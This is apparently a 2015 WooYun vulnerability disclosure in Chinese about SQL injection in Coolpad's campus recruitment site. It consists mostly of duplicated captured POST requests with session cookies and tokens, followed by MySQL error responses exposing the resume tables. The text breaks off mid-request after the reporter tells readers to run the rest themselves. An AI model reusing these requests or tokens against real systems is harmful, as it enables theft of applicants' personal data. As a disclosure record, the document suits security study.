手机行业安全之宇龙通信（酷派）多出处SQL注射(目测暴露用户简历)

发表于 2015年07月13日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0126495

漏洞标题：手机行业安全之宇龙通信（酷派）多出处SQL注射(目测暴露用户简历)

漏洞详情

披露状态：

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认，细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述：

手机行业安全之宇龙通信（酷派）SQL注射(可暴露用户简历)

详细说明：

注入参数均为field_coolyunid=

1	注入参数均为field_coolyunid=

http://campus.coolpad.com/

1	http://campus.coolpad.com/

经过测试以下修改处存在注入！0x00个人信息》编辑>保存》抓包

POST /index.php?c=submitResumes&f=savePersonalInfo HTTP/1.1<br>
Host: campus.coolpad.com<br>
Proxy-Connection: keep-alive<br>
Content-Length: 722<br>
Accept: application/json, text/javascript, */*; q=0.01<br>
Origin: http://campus.coolpad.com<br>
X-Requested-With: XMLHttpRequest<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36<br>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br>
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit<br>
Accept-Encoding: gzip, deflate<br>
Accept-Language: zh-CN,zh;q=0.8<br>
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%22923343d9b5cc60459390386fd1f715da%22%7D%7Dfield_coolyunid=32564674&field_preview=edit&info%5Bfield_photo%5D=public%2Fuploads%2F2015-07-13%2F14367740192603.jpg&info%5Bfield_realname%5D=%E9%83%BD%E6%98%AF&info%5Bfield_card_type%5D=idcard&info%5Bfield_idcard%5D=110101199609080097&info%5Bfield_sex%5D=gentleman&info%5Bfield_birthday%5D=1996-09-08&info%5Bfield_nation%5D=&info%5Bfield_health%5D=better&info%5Bfield_marital_status%5D=unmarried&info%5Bfield_political_status%5D=members&info%5Bfield_living_city%5D=sad&info%5Bfield_origin_palce%5D=dadad&info%5Bfield_before_colloge_residence%5D=%E5%B7%B4%E9%9F%B3%E9%83%AD%E6%A5%9E%E8%92%99%E5%8F%A4%E8%87%AA%E6%B2%BB%E5%B7%9E&info%5Bfield_graduation_time%5D=2015-01-01&info%5Bfield_height%5D=160&info%5Bfield_weight%5D=0

POST /index.php?c=submitResumes&f=savePersonalInfo HTTP/1.1

Host: campus.coolpad.com

Proxy-Connection: keep-alive

Content-Length: 722

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://campus.coolpad.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%22923343d9b5cc60459390386fd1f715da%22%7D%7Dfield_coolyunid=32564674&field_preview=edit&info%5Bfield_photo%5D=public%2Fuploads%2F2015-07-13%2F14367740192603.jpg&info%5Bfield_realname%5D=%E9%83%BD%E6%98%AF&info%5Bfield_card_type%5D=idcard&info%5Bfield_idcard%5D=110101199609080097&info%5Bfield_sex%5D=gentleman&info%5Bfield_birthday%5D=1996-09-08&info%5Bfield_nation%5D=&info%5Bfield_health%5D=better&info%5Bfield_marital_status%5D=unmarried&info%5Bfield_political_status%5D=members&info%5Bfield_living_city%5D=sad&info%5Bfield_origin_palce%5D=dadad&info%5Bfield_before_colloge_residence%5D=%E5%B7%B4%E9%9F%B3%E9%83%AD%E6%A5%9E%E8%92%99%E5%8F%A4%E8%87%AA%E6%B2%BB%E5%B7%9E&info%5Bfield_graduation_time%5D=2015-01-01&info%5Bfield_height%5D=160&info%5Bfield_weight%5D=0

HTTP/1.1 200 OK<br>
Date: Mon, 13 Jul 2015 08:27:31 GMT<br>
Server: nginx/1.6.0<br>
Content-Type: text/html; charset=utf-8<br>
X-Powered-By: PHP/5.5.10<br>
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)<br>
Connection: keep-alive<br>
Content-Length: 899<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET  `s_photo`='public/uploads/2015-07-13/14367740192603.jpg' , `s_realname`='é½æ¯' , `s_card_type`='idcard' , `s_idcard`='110101199609080097' , `s_sex`='gentleman' , `s_birthday`='1996-09-08' , `s_nation`='' , `s_health`='better' , `s_marital_status`='unmarried' , `s_political_status`='members' , `s_living_city`='sad' , `s_origin_palce`='dadad' , `s_before_colloge_residence`='å·´é³éæ¥èå¤èªæ²»å·' , `s_graduation_time`='2015-01-01' , `s_height`='160' , `s_weight`='0'  WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:27:30

HTTP/1.1 200 OK

Date: Mon, 13 Jul 2015 08:27:31 GMT

Server: nginx/1.6.0

Content-Type: text/html; charset=utf-8

X-Powered-By: PHP/5.5.10

X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Length: 899A mysql error has occurred! Error Number:1064 Error Description:[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET `s_photo`='public/uploads/2015-07-13/14367740192603.jpg' , `s_realname`='é½æ¯' , `s_card_type`='idcard' , `s_idcard`='110101199609080097' , `s_sex`='gentleman' , `s_birthday`='1996-09-08' , `s_nation`='' , `s_health`='better' , `s_marital_status`='unmarried' , `s_political_status`='members' , `s_living_city`='sad' , `s_origin_palce`='dadad' , `s_before_colloge_residence`='å·´é³éæ¥èå¤èªæ²»å·' , `s_graduation_time`='2015-01-01' , `s_height`='160' , `s_weight`='0' WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Error Time:2015-07-13 16:27:30

0x01联系方式》编辑》保存》抓包

POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1<br>
Host: campus.coolpad.com<br>
Proxy-Connection: keep-alive<br>
Content-Length: 163<br>
Accept: application/json, text/javascript, */*; q=0.01<br>
Origin: http://campus.coolpad.com<br>
X-Requested-With: XMLHttpRequest<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36<br>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br>
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit<br>
Accept-Encoding: gzip, deflate<br>
Accept-Language: zh-CN,zh;q=0.8<br>
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7Dfield_coolyunid=32564674&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989

POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1

Host: campus.coolpad.com

Proxy-Connection: keep-alive

Content-Length: 163

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://campus.coolpad.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7Dfield_coolyunid=32564674&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989

HTTP/1.1 200 OK<br>
Date: Mon, 13 Jul 2015 08:29:50 GMT<br>
Server: nginx/1.6.0<br>
Content-Type: text/html; charset=utf-8<br>
X-Powered-By: PHP/5.5.10<br>
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)<br>
Connection: keep-alive<br>
Content-Length: 525<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET  `s_tel`='15099999999' , `s_email`='[email protected]' , `s_address`='' , `s_emergency_number`='15988880989'  WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:29:49

HTTP/1.1 200 OK

Date: Mon, 13 Jul 2015 08:29:50 GMT

Server: nginx/1.6.0

Content-Type: text/html; charset=utf-8

X-Powered-By: PHP/5.5.10

X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Length: 525A mysql error has occurred! Error Number:1064 Error Description:[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET `s_tel`='15099999999' , `s_email`='[email protected]' , `s_address`='' , `s_emergency_number`='15988880989' WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Error Time:2015-07-13 16:29:49

0x02技能/爱好》编辑》保存》抓包

POST /index.php?c=submitResumes&f=saveSkillsHobbiesInfo HTTP/1.1<br>
Host: campus.coolpad.com<br>
Proxy-Connection: keep-alive<br>
Content-Length: 297<br>
Accept: application/json, text/javascript, */*; q=0.01<br>
Origin: http://campus.coolpad.com<br>
X-Requested-With: XMLHttpRequest<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36<br>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br>
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit&r=0.38695669337175786<br>
Accept-Encoding: gzip, deflate<br>
Accept-Language: zh-CN,zh;q=0.8<br>
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7Dfield_coolyunid=32564674&hobb%5Bfield_english_level%5D=cet4&hobb%5Bfield_english_scores%5D=1132&hobb%5Bfield_english_certficate%5D=13&hobb%5Bfield_english_certficate_date%5D=2014-01-01&hobb%5Bfield_english_certficate_scores%5D=123&hobb%5Bfield_other_skills%5D=3&hobb%5Bfield_personal_hobbies%5D=31

POST /index.php?c=submitResumes&f=saveSkillsHobbiesInfo HTTP/1.1

Host: campus.coolpad.com

Proxy-Connection: keep-alive

Content-Length: 297

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://campus.coolpad.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit&r=0.38695669337175786

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7Dfield_coolyunid=32564674&hobb%5Bfield_english_level%5D=cet4&hobb%5Bfield_english_scores%5D=1132&hobb%5Bfield_english_certficate%5D=13&hobb%5Bfield_english_certficate_date%5D=2014-01-01&hobb%5Bfield_english_certficate_scores%5D=123&hobb%5Bfield_other_skills%5D=3&hobb%5Bfield_personal_hobbies%5D=31

HTTP/1.1 200 OK<br>
Date: Mon, 13 Jul 2015 08:31:23 GMT<br>
Server: nginx/1.6.0<br>
Content-Type: text/html; charset=utf-8<br>
X-Powered-By: PHP/5.5.10<br>
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)<br>
Connection: keep-alive<br>
Content-Length: 439<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) SELECT COUNT(*) FROM `clp_seekers_skills_hobbies`  WHERE `s_id`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:31:23

HTTP/1.1 200 OK

Date: Mon, 13 Jul 2015 08:31:23 GMT

Server: nginx/1.6.0

Content-Type: text/html; charset=utf-8

X-Powered-By: PHP/5.5.10

X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Length: 439A mysql error has occurred! Error Number:1064 Error Description:[Execute sql sentence error! SQL :(-) SELECT COUNT(*) FROM `clp_seekers_skills_hobbies` WHERE `s_id`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Error Time:2015-07-13 16:31:23

》》》》》刚才看到厂商把洞确认了，没想到评了个低，没心情一个一个写了，直接跑吧，其他自己查！！《《《《《0x03其中的一个包

POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1<br>
Host: campus.coolpad.com<br>
Proxy-Connection: keep-alive<br>
Content-Length: 164<br>
Accept: application/json, text/javascript, */*; q=0.01<br>
Origin: http://campus.coolpad.com<br>
X-Requested-With: XMLHttpRequest<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36<br>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br>
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit<br>
Accept-Encoding: gzip, deflate<br>
Accept-Language: zh-CN,zh;q=0.8<br>
